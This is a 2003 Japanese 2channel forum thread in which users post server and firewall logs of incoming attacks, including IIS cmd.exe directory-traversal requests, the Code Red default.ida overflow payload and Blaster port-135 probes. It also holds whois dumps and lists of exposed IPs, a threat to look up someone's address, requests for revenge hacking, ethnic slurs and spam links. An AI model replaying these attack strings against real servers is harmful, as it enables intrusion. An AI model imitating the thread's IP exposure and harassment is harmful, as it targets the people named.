2003/07/08(22:27:36) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/07/08(22:27:36) W-SV 218.43.3.181 [80] 403 275 "GET /_vti_bin/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:37) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/07/08(22:27:37) W-SV 218.43.3.181 [80] 403 275 "GET /_mem_bin/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:37) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/msadc/..\../..\../..\/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/07/08(22:27:37) W-SV 218.43.3.181 [80] 403 288 "GET /msadc/..\../..\../..\/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

inetnum: 213.200.120.0 - 213.200.127.255
netname: NACNET-EU
descr: Tiscali International Network B.V.
descr: Robert-Bosch-Str. 32
descr: D-63303 Dreieich
country: DE
admin-c: SE33-RIPE
tech-c: TIS333-RIPE
status: ASSIGNED PA
notify: [email protected]
mnt-by: TISCALI-INT-NET
changed: [email protected] 20020429
changed: [email protected] 20020930
source: RIPE

inetnum: 217.159.2.0 - 217.159.15.255
netname: Satlynx_Sat_Net_1
descr: Satlynx Satellite Link 1a
descr: Illerstr. 15
descr: D-71522 Backnang
descr: Germany
country: DE
admin-c: HB13461-RIPE
tech-c: RW552-RIPE
tech-c: HZI1-RIPE
status: ASSIGNED PA
mnt-by: GILAT-MNT
changed: [email protected] 20030318
source: RIPE

2003/07/09(05:22:46) W-SV 218.57.136.99 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/09(05:22:47) W-SV 218.57.136.99 [80] 404 225 "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/09(05:22:48) W-SV 218.57.136.99 [80] 404 225 "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/09(05:22:56) W-SV 218.57.136.99 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.57.136.99 "/scripts/..\../winnt/system32/cmd.exe" ]"
2003/07/09(05:22:56) W-SV 218.57.136.99 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/09(05:23:02) W-SV 218.57.136.99 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.57.136.99 "/scripts/../../winnt/system32/cmd.exe" ]"
2003/07/09(05:23:02) W-SV 218.57.136.99 [80] 403 262 "GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

http://satellite.esenden.com/ranking/ranklink.cgi?id=mercury

inetnum: 213.200.120.0 - 213.200.127.255
netname: NACNET-EU
descr: Tiscali International Network B.V.
descr: Robert-Bosch-Str. 32
descr: D-63303 Dreieich
country: DE
admin-c: SE33-RIPE
tech-c: TIS333-RIPE
status: ASSIGNED PA
notify: [email protected]
mnt-by: TISCALI-INT-NET
changed: [email protected] 20020429
changed: [email protected] 20020930
source: RIPE

>>516
調子乗ってると、おまえの住所調べ上げんぞ。
それなりのソフトもあるしな。うひょげら

ぷｹﾞﾗぷぷぷ

ペット〜キライ〜

http://homepage.mac.com/hiroyuki44/hankaku09.html

↑糞アダルトリンク

>>520
調子乗ってると、おまえの住所調べ上げんぞ。
それなりのソフトもあるしな。うひょげら

お前らそんなに知識あるならお願いがある。
北朝鮮の糞どもにギャフンと言わせたい！！
どうしたらいい？
ヒントでもいいから教えてください
とりあえずはハードディスクをめちゃめちゃにしたいっす

>>523
プッ

2003/07/10(04:02:18) W-SV 218.27.77.40 [80] 404 237 "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"

9 40 ms 40 ms 50 ms 62.216.128.245
10 40 ms 50 ms 50 ms 62.216.144.246
11 40 ms 50 ms 50 ms adsl029101.usr.hananet.net [210.94.29.101]
12 50 ms * * 218.39.19.34
13 51 ms 50 ms 50 ms 211.117.1.162
14 50 ms 60 ms 60 ms 218.236.67.46
15 50 ms 50 ms 50 ms 218.39.28.150
16 50 ms 50 ms 51 ms 219.250.35.211
この韓国人のバカは死ね

http://homepage.mac.com/hiroyuki44/

>526
師ね

220.96.209.78=p8078-ipadfx01awa.osaka.ocn.ne.jp
CSK-中部相互警備保障株式会社 [We are protect your wealth]
会社のPC(IIS)を使ってHP運営してるのはいいけど
自分の会社のHPも警備しろよ。

ワームに感染してるよ

2003/07/10(21:19:37) W-SV 220.96.209.78 [80] 404 237 "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd
3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"

2003/07/11(11:32:14) W-SV 61.195.3.44 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/11(11:32:14) W-SV 61.195.3.44 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 61.195.3.44 "/scripts/../../winnt/system32/cmd.exe" ]"
2003/07/11(11:32:14) W-SV 61.195.3.44 [80] 403 262 "GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

>>552
そんなことくちだけじゃなくて実際にやって
みてくださいよ・・・・どうせむりなんでしょ？？？？？

画像欲しさにアクセスしてきたホスト公開
こいつらみんな画像ほしいんだな。

http://www.sphera-jp.com/secret.log

sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。

fltky2-p199.hi-ho.ne.jp(219.126.169.200)

IPアドレス
172.197.176.124
ホスト名
ACC5B07C.ipt.aol.com
IPアドレス
　割当国　
アメリカ合衆国 (US)

Name: 218-228-205-242.eonet.ne.jp
Address: 218.228.205.242
2003/07/12 15:04:09Treadrop attack

Name: o079126.ap.plala.or.jp
Address: 219.167.79.126
2003/07/12 17:15:06Neastea attack

>>533
>IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台も悪．晒せ

IPアドレス
24.57.18.211
ホスト名
d57-18-211.home.cgocable.net
IPアドレス
　割当国　※
カナダ (CA)
IPアドレス所有者情報
Cogeco Cable Inc. CGOC-3BLK (NET-24-57-0-0-1)
24.57.0.0 - 24.57.255.255
Cogeco Cable Solutions CGOC-WIDO2-1 (NET-24-57-16-0-1)
24.57.16.0 - 24.57.31.255

218.13.37.133
220.4.96.91
202.98.123.49
63.57.19.42
202.19.129.136
211.83.248.26
61.217.124.221
202.130.83.98
211.5.36.132
67.202.109.204

66.199.149.229
202.97.143.205

217.59.156.35:3679

YahooBB220044017017.bbtec.net
211.99.96.200

202.109.129.136

拒否された電子メール アドレス : **************
件名 '', アカウント : 'es-maili.esnet.ed.jp',
サーバー : 'es-maili.esnet.ed.jp',
プロトコル : SMTP, サーバーの応答 : '553 5.3.0 <*********>...
This Server es-maili is not supported Internet Mail Service..', ポ
ート : 25, セキュリティ (SSL) : なし

IPアドレス　192.168.1.8
サブネットマスク　255.255.255.0
デフォルトゲートウェイ　192.168.1.100

ＤＮＳサーバー 10.20.33.18

sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。

というか踏み台を晒してくれているお陰でわざわざスキャンしなくて済みます。
ありがとう、初心者。

このスレってやっぱ問題じゃね？
困る人とかいるんじゃねーの？

>>548
死にな

>>548
踏み台探す時間が省けて助かってるけど。

>>550
氏ね、捕まれ

初めまして初心者だすよ
女にいじめを受けているので復讐として
奴らにハッキングする方法思いついた
誰か知っている人はみまそんか？？？？？

>>552
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。

>>552
ファッキング？

265.289,.29.893

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

66.28.187.245

218.70.245.64

#218.70.245.64

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.124.0.0-61.124.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] AI018JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/01/31
[返却年月日]
[最終更新] 2001/02/02 10:39:04 (JST)
[email protected]

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.43.128.0-218.43.191.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [運用責任者] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/11/27
[返却年月日]
[最終更新] 2001/12/25 19:39:40 (JST)
[email protected]

ｳｻﾞｲぞ福岡人

200.80.33.36

ぞぬ入れてる香具師いる？

>>564
ホットゾヌ入れてる

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.141.32.0-203.141.47.0
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [運用責任者] IT018JP
n. [技術連絡担当者] IT018JP
p. [ネームサーバ] dnsg01.yahoo.co.jp
p. [ネームサーバ] dnsn201.yahoo.co.jp
y. [通知アドレス] [email protected]
[割当年月日] 2003/02/07
[最終更新] 2003/03/06 17:17:41 (JST)
[email protected]

もうね、２、３日で２５５回もしかけてくんなと。
総当りすンなと。
お腹いぱーいだＹｏ！

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.116.0.0-219.116.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2002/10/16
[最終更新] 2003/04/16 14:08:58 (JST)
[email protected]

219.129.50.6sql
142.154.193.103sql
64.237.33.10sql
219.133.46.200sql

支那人ｳｻﾞｲ

219.111.85.231
231.85.111.219.dy.bbexcite.jp

>>569
いい加減にしてよ

>>570
何がだ

>>571
ageるの

65.35.169.116 6535169hfc116.tampabay.rr.com

61.40.220.235

>>573
死ね

>>574
おまえが死ね！

★クリックで救えるオマ○コがあるらしい★
http://yahooo.s2.x-beat.com/linkvp/linkvp.html

>>575
師ね　

>>575
氏ね

>>574は過去に晒されたお馬鹿ちゃん

>>579はログのほとんどがゴミバケツであることを理解していない

>>579
( ´,_ゝ｀)ﾌﾟｯ

そんなもんありません
200.102.24.152 - - [20/Jul/2003:10:18:03 +0000] "GET /phpwebsite/setup/ HTTP/1.0
" 302 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.102.24.152 - - [20/Jul/2003:10:18:05 +0000] "GET /setup/ HTTP/1.0" 302 278 "
-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

213.114.161.203 ←こいつしつこいseドメイン
66.143.58.33
220.210.235.138
210.63.140.123
65.169.6.4

attaker への対処例をみつけました。
こんなので解決できるのかな？

ttp://ohmoriws1.ms.kagu.tus.ac.jp/lab_master/tawai_contents/attacker.html

attaker -> attacker

sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。

ハッカー逮捕！！犯人は２ちゃんねらー！！
【進入】大手芸能プロダクションＨＰ改ざんの疑い【ウィルス】
http://human2.2ch.net/test/read.cgi/owarai/1058692852/l50

キターーーなんかいっぱいくましたぁ！！！
news.redcentre.net
news.redcentre.net
saftdwin.demon.co.uk
200-207-88-30.dsl.telesp.net.br
221.red-80-33-36.pooles.rima-tde.net
dragon.dmf.go.th

218.123.72.69:3042

http://homepage3.nifty.com/coco-nut/
　　_、_
（　,_ﾉ` )y━･~~~　見たらどうだ・・・

広告よけアゲ

age

>>1よ、お前みたいな奴をみると、あの日のことを思い出すよ。
２００１年１１月２８日。MXユーザーが逮捕された日だよ。
MXユーザーが逮捕されて、祭になってさ、
その日のうちに糞スレが乱立されてた日だよ。
あのときのダウソ板の住人、カッコよかったんだぜ。「総力を結集」ってのはまさにああいう状態だよ。
糞スレを３倍にしないと逮捕、ってもんだから、糞スレ立てまくってさ、
そしたらほんの何時間かで完成したんだよ。それが聞いてくれよ、目標は３倍だったのに
１６倍まで乱立に成功しやがったんだよ。職人技なんてもんじゃねえよ、神技だよ。
でもよ、そうやって頑張る人がいた一方で、「もうだめぽ」とか駄レスしたバカも
いたわけだよ。ちょうど、今のお前みたいにな。
だからよ、俺たちは総力を結集して、お前のバカ度を１６倍にしようと思うよ。
ま、倍増後でもお前のバカ度はこの世に生かしておくことのできないレベルだけどな。
要するに俺らの力を結集してもお前を助けることができないってことだ。
わかったら、まわりに迷惑をかけないようにひっそりと死んでくれよな

cr4-201-241.seaple.ne.jp

Domain Information: [ドメイン情報]
a. [ドメイン名] SEAPLE.NE.JP
b. [ねっとわーくさーびすめい] しーぷるねっとならしの
c. [ネットワークサービス名] しーぷるねっと習志野
d. [Network Service Name] seaplenet-narashino
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] MS6180JP
n. [技術連絡担当者] KH5470JP
p. [ネームサーバ] ns1.jcnet.ad.jp
p. [ネームサーバ]

p. [ネームサーバ] ns2.jcnet.ad.jp
y. [通知アドレス] [email protected]
[状態] Connected (2004/06/30)
[登録年月日] 2002/06/18
[接続年月日] 2002/07/12
[最終更新] 2003/07/01 02:18:07 (JST)
[email protected]

219.112.201.241

IPアドレス 218.123.72.69
ホスト名 YahooBB218123072069.bbtec.net

あー、うぜー。
好きにしたって。

220.77.210.171

210.94.186.96
210.94.160.0
210.94.191.255
61.144.0.0
61.144.255.255
61.16.111.96
61.16.111.127
61.16.111.126
80.116.249.129
24.209.220.192
61.84.180.184
61.92.50.133
64.47.205.252
64.123.137.30
68.114.152.134

http://IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII/
http://IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII/
http://IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII/
http://IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII/
http://IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII/
http://IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII/
http://IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII/
http://IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII/
http://IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII/

usen-219x120x221x79.ap-US.usen.ad.jp
p2118-ip02souka.saitama.ocn.ne.jp

http://homepage.mac.com/hiroyuki44/hankaku04.html

ddb715a09.oct-net.ne.jp
94.27.244.43.ap.livedoor.jp

こいつら、無差別攻撃してるらしいぞ。

http://homepage.mac.com/hiroyuki44/

>>601
いい加減にしてください

http://homepage.mac.com/hiroyuki44/hankaku04.html

http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine
http://profiles.yahoo.co.jp/ray_zine

>>605
分かったから、ネットwatch板でやれよ
あそこならお前みたいなやつが一杯いるからよ
仲良くやって来い

IPアドレス 213.122.197.72
ホスト名 host213-122-197-72.in-addr.btopenworld.com

http://www.adultshoping.com/addclickport.cgi?pid=1058922748
●無料でパソコンだけで月に１０万円↑稼げます！
登録完全無料！お小遣いが沢山稼げちゃいます。
月に平均１０万円ほど稼げます。頑張ればもっと！
夏休みを有効に利用しましょう！
無料だから登録しないと損します〜。

>>607
いい加減にしてください

みてね〜♪
http://www2.free-city.net/home/kojiro/page004.html

h

http://homepage.mac.com/hiroyuki44/hankaku08.html

広告よけage

TearDrop攻撃された - Source:219.126.138.223

>>614
TeaDropの意味が分かってないに1000ペリカ

220.77.210.171←しつこすぎる
213.227.19.162

192.168.0.1←こいつしつこい！氏ね！

ハア〜？

>>617
糞暑い夏にあなたのつまらない洒落で冷えました。
ありがとうございます。

192.168.0.1なら、ネットに繋がなくても存在しますね。

207.89.211.194

620.617.614.607 <-死ね

あぼーん

81.213.0.73
212.235.117.229
133.205.228.244
66.117.30.76
172.172.76.187
64.236.237.57
209.86.207.181
195.146.99.180

172.145.221.66
172.157.234.118
209.187.115.88
218.176.200.33
172.137.219.7
24.81.13.115
218.176.201.10
218.176.200.92

>>615
TearDropってなに？
使ってみたけどよくわからん

61.74.31.127

218.230.246.158

私が作ったから凄いんだから♪

http://www3.free-city.net/home/akipon/page001.html

ピンク色だよ〜♪何がって？見ればわかるよ！

http://angely.h.fc2.com/page008.html

>>627
韓国からだね。
ソウルの･･･っ怖！！
これ以上は止める。

>>628
会社みたいだね。
会社名：ア○イ○○株式会社
責任者：○田 ○一
住所　：東京都豊島区

>>627→>>626
>>628→>>627

でしたｽﾏｿ

>>629
(((((((( ；ﾟДﾟ)))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙｶﾞﾀｶﾞﾀﾌﾞﾙｶﾞﾀｶﾞｸｶﾞｸｶﾞｸｶﾞｸｶﾞｸ

>>629
気になるよ

age

Yahooの所持IPからアタック来たぞｺﾞﾙｧ
211.14.15.96
[ JPNIC & JPRS database provides information on network administration. Its ]
[ use is restricted to network administration purposes. For further infor- ]
[ mation, use 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, ]
[ add'/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.14.12.0-211.14.15.0
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [運用責任者] IT018JP
n. [技術連絡担当者] IT018JP
p. [ネームサーバ] dnsg01.yahoo.co.jp/211.14.12.0-211.14.15.0
p. [ネームサーバ] dnsn201.yahoo.co.jp/211.14.12.0-211.14.15.0
y. [通知アドレス] [email protected]
[割当年月日] 2001/09/17
[返却年月日]
[最終更新] 2001/11/27 10:25:30 (JST)
[email protected]

>>634
とっくに死滅したかと思っていたが、まだwhois得意になって貼る馬鹿が生き残ってるのか…

http://homepage.mac.com/hiroyuki44/

http://homepage.mac.com/hiroyuki44/2ch.html

あげ

夏だねぇ

IP取得しても、大した事は出来ないよ？
下のサイトで良い子の皆も頑張って勉強しようね。

http://www.nic.ad.jp/
あんちやふー
How To Become A Hacker
http://www.geocities.co.jp/SiliconValley/8474/index.html

＊それとクラックは犯罪ですよ。

スーマリの改造でもしてなさいってこった？

>>639
んじゃてめーがフシアナしろよ

>>639
何気に親切だな（ｗ

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

あげ

age

IP: 202.133.227.202
Node: AD
Group: WORKGROUP
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 000255D6D473
DNS: 202.133.227.main1.above.net.tw

IP: 219.162.47.100
Node: タイガーウッズ
Group: WORKGROUP
NetBIOS: ADMINISTRATOR
MAC: 005345000000
DNS: p4100-ipbf29marunouchi.tokyo.ocn.ne.jp

IP: 200.204.99.169
Node: ADMINISTRADOR
Group: QUASARPROD
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 00E04CDD38B7
DNS: 200-204-99-169.dsl.telesp.net.br

219.20.66.106

inetnum: 202.123.128.0 - 202.123.159.255
netname: TALAYA2000
descr: IT&E OVERSEAS, INC.
descr: P.O. BOX 24881
descr: GMF
country: GU
admin-c: CT113-AP
tech-c: CT113-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-GU-TALAYA
changed: [email protected] 20000802
status: ALLOCATED PORTABLE
source: APNIC

IPアドレス 218.123.72.195
ホスト名 YahooBB218123072195.bbtec.net
IPアドレス
割当国　※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 xDSL

24.157.141.78
からアクセスがきた。
こいつを不正アクセス禁止法で裁くには
どういう手続きをとればいいの？

IPアドレス 24.157.141.78
ホスト名 CPE0060b07cfdb1-CM014200015522.cpe.net.cable.rogers.com
IPアドレス
　割当国　※ カナダ (CA)

こいつをなんとか裁きたいのだが・・

はかーのバカ共は原則処刑だな・・

DNS鯖をアタックだと勘違いしてるおばかさん達。

>>655
ICPAに告訴するか・・
のぉ！

>>655むふふ

http://homepage.mac.com/hiroyuki45/

昨日はポート1177に来るんだけど俺だけか？？？

ああ、俺だ

１２２３.344.4944033.3234484.

今、30秒おきくらいの頻度でport135をつつかれまくってるんだけど、何か始まってんの?
IPは、多すぎて書ききれまへん。(踏み台かも知れんけど)

>>662
PC初心者板で再起動祭り発生中
これが原因かも↓
http://www.microsoft.com/japan/security/security_bulletins/ms03-026e.asp

上のお陰で
もう4回ほど再起動した
また例のカウントダウンが始まるのだろうか…

>>664
135を塞ぐか、パッチＤＬしろ

無

http://homepage.mac.com/hiroyuki45/

>>663
やっぱり他でも起こってるんですね…
ってか、これ↓みたいですね。
http://www.symantec.com/region/jp/sarcj/data/w/w32.blaster.worm.html
ついにトロイじゃなくてワームが出たんだ…

ちなみに、ルータにしてるマシンのiplogはこんな感じです。
まだまだ続きそう。
Aug 12 06:50:25 TCP: port 135 connection attempt from 218.226.225.164:1676
Aug 12 06:58:22 TCP: port 135 connection attempt from 218.226.227.56:1696
Aug 12 06:58:40 TCP: port 135 connection attempt from 66.75.218.112:2511
Aug 12 06:58:40 TCP: port 135 connection attempt from 218.226.186.13:4529
Aug 12 07:03:41 TCP: port 135 connection attempt from 218.226.221.53:2470
Aug 12 07:03:46 TCP: port 135 connection attempt from 218.226.220.216:2968
Aug 12 07:12:24 TCP: port 135 connection attempt from 218.226.211.219:4433
Aug 12 07:12:29 TCP: port 135 connection attempt from 218.226.217.107:4281
Aug 12 07:13:16 TCP: port 135 connection attempt from 218.226.225.198:1420
Aug 12 07:14:43 TCP: port 135 connection attempt from 218.226.220.216:1934

★☆　夏休みは　ＧＥＴＤＶＤ　で満喫・満喫！！　★☆★
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★
☆★　送料激安！　　スピード発送！　　商品豊富！　　　
★☆　　　　　　http://www.get-dvd.com　　　　　　　　
☆★　激安ＤＶＤショップ　「ＧＥＴＤＶＤドットコム」　
★☆　　　　　　http://www.get-dvd.com　　　　　　　　
☆★　今すぐアクセス　Ｌｅｔ’ｓ　Ｇｏ・Ｇｏ！！　　　
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★

210.224.181.7様(さくらインターネット契約)、
あなたからは
telnet,finger,pop2,printer,squdup,uupc,whois,login,8080,nntp,execなど、
ありとあらゆるポートに攻撃を仕掛けてきているか、踏み台にされている可能性があります。

と思ったら勘違いでした。
謹んでお詫び申し上げます。

Name: c113110.tctv.ne.jp
Address: 219.122.113.110

死んで詫びろ。馬鹿。

IP: 61.207.116.252
DNS: p3252-ip01kokuryo.gunma.ocn.ne.jp
Node: 無邪気
NetBIOS: 一号機
Group: WORKGROUP
MAC: 005345000000

うちは135だけじゃなく、137も頻繁につつかれてる・・・
非常にうざい

Someone from www.hakusuisha.co.jp [219.109.220.132], port 3904 wants to connect to port 135 owned by 'Generic Host Process for Win32 Services' on your

kitauze-


時間, イベント, 侵入者, カウント
03/08/12 23:20:50, MSRPC TCP port probe, kita145058.kitanet.ne.jp, 2
03/08/12 23:20:41, MSRPC TCP port probe, kita142252.kitanet.ne.jp, 3
03/08/12 23:19:36, MSRPC TCP port probe, kita137119.kitanet.ne.jp, 1
03/08/12 23:18:03, MSRPC TCP port probe, kita140054.kitanet.ne.jp, 2
03/08/12 23:17:49, MSRPC TCP port probe, kita141200.kitanet.ne.jp, 2
03/08/12 23:10:00, MSRPC TCP port probe, kita144117.kitanet.ne.jp, 2
03/08/12 23:08:46, MSRPC TCP port probe, kita142229.kitanet.ne.jp, 2
03/08/12 23:07:38, MSRPC TCP port probe, kita145001.kitanet.ne.jp, 1
03/08/12 23:06:57, MSRPC TCP port probe, kita144134.kitanet.ne.jp, 2
03/08/12 22:57:25, MSRPC TCP port probe, kita142172.kitanet.ne.jp, 1
03/08/12 16:42:07, MSRPC TCP port probe, kita144225.kitanet.ne.jp, 4
03/08/12 16:37:37, MSRPC TCP port probe, kita143022.kitanet.ne.jp, 2
03/08/12 16:31:34, MSRPC TCP port probe, kita145058.kitanet.ne.jp, 1
03/08/12 16:28:03, MSRPC TCP port probe, kita141151.kitanet.ne.jp, 1
03/08/12 16:26:55, MSRPC TCP port probe, kita143154.kitanet.ne.jp, 1
03/08/12 16:25:38, MSRPC TCP port probe, kita142031.kitanet.ne.jp, 1
03/08/12 16:25:25, MSRPC TCP port probe, kita141197.kitanet.ne.jp, 1
03/08/12 16:25:01, MSRPC TCP port probe, kita141109.kitanet.ne.jp, 3
03/08/12 16:22:42, MSRPC TCP port probe, kita143055.kitanet.ne.jp, 2
03/08/12 16:18:26, MSRPC TCP port probe, kita144208.kitanet.ne.jp, 1
03/08/12 16:17:21, MSRPC TCP port probe, kita141088.kitanet.ne.jp, 2
03/08/12 16:17:20, MSRPC TCP port probe, kita143076.kitanet.ne.jp, 1
